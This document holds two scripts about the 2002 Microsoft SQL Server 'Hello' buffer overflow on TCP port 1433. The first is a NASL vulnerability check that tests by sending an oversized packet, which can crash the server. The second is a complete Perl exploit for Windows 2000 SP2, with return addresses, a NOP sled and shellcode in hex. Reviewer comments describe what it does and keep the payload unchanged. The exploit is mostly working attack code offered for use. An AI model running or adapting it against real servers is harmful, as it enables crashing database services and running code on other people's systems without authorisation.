##
# # this script tests for the "You had me at hello" overflow # in MSSQL (tcp/1433) # Copyright Dave Aitel (2002) # Bug found by: Dave Aitel (2002) # ## #TODO: #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! if(description) { script_id(11067); # script_cve_id("CVE-2000-0402"); script_version ("$Revision: 0.1 $"); name["english"] = "Microsoft SQL Server Hello Overflow"; script_name(english:name["english"]); desc["english"] = " The remote MS SQL server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Microsoft SQL Server Hello Overflow"; script_summary(english:summary["english"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel"); family["english"] = "Windows"; script_family(english:family["english"]); script_require_ports(1433); exit(0); } # # The script code starts here # #taken from mssql.spk pkt_hdr = raw_string( 0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b ,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02 ,0x10 ,0x00 ,0x00 ,0x00 ); #taken from mssql.spk pkt_tail = raw_string ( 0x00 ,0x24 ,0x01 ,0x00 ,0x00 ); #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! port = 1433; found = 0; report = "The SQL Server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). 
Risk factor : High"; if(get_port_state(port)) { soc = open_sock_tcp(port); if(soc) { #uncomment this to see what normally happens #attack_string="MSSQLServer"; #uncomment next line to actually test for overflow attack_string=crap(560); # this creates a variable called sql_packet sql_packet = pkt_hdr+attack_string+pkt_tail; send(socket:soc, data:sql_packet); r = recv(socket:soc, length:4096); close(soc); #display ("Result:",r,"\n"); if(!r) { # display("Security Hole in MSSQL\n"); security_hole(port:port, data:report); } } } |
#!/usr/local/bin/perl
#-----------------------------------------------------------
# Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
# by sk@scan-associates.net & spoonfork
#
# Bug found by
# Dave Aitel
# http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to: scan clan, especially to tynon, pokleyzz, and wyse
# Alphaque and L33tdawg.
# and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
# http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
#
# What this script does, as far as the code shows: resolve the host
# given on the command line, open one TCP connection to port 1433,
# write a single fixed 748-byte buffer ($bug) and exit. Nothing is
# ever read back from the socket.
#
# NOTE(review): no `use strict`/`use warnings`; SOCKET is a bareword
# package-global handle and is never closed explicitly (the script
# relies on process exit). The payload byte strings below are kept
# byte-for-byte and are intentionally not annotated here.

# Provides inet_aton, pack_sockaddr_in, PF_INET and SOCK_STREAM.
use Socket;

# Single positional argument: the target host name or address.
$connect_host = $ARGV[0];
if (!defined($connect_host)) {
    print "Usage: $0 <target>\n";
    exit 255;
}

# Default MSSQL TCP listener port.
$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";

# Turn on autoflush for SOCKET so the single print below is written
# immediately, then restore STDOUT as the default output handle.
select(SOCKET); $|=1; select(STDOUT);

# Fixed 36-byte header, followed by 528 filler bytes.
$bug = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .= "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .= "\x10\x00\x00\x00";
$bug2 = "A" x 528;
$bug .= $bug2;

# Author's payload; reproduced unchanged, not documented.
$bug .= "\x6b\xd0\xc0\x40";
$bug .= "AAAA";
$bug .= "\x83\x91\xe8\x77";
$bug .= "\x50\x1e\xd0\x42";
$bug .= "\x0b\x03\x0f\x02";
$bug .= "DDDD";
$bug .= "\x50\x1e\xd0\x42";
$bug .= "\x50\x1e\xd0\x42";
$bug3 = "\x90" x 88;
$bug .= $bug3;
$bug .= "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .= "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .= "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .= "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

# Fixed 5-byte trailer.
$bug .= "\x00\x24\x01\x00\x00";

# One write; no response is read and the handle is left open until
# the process exits.
print SOCKET $bug;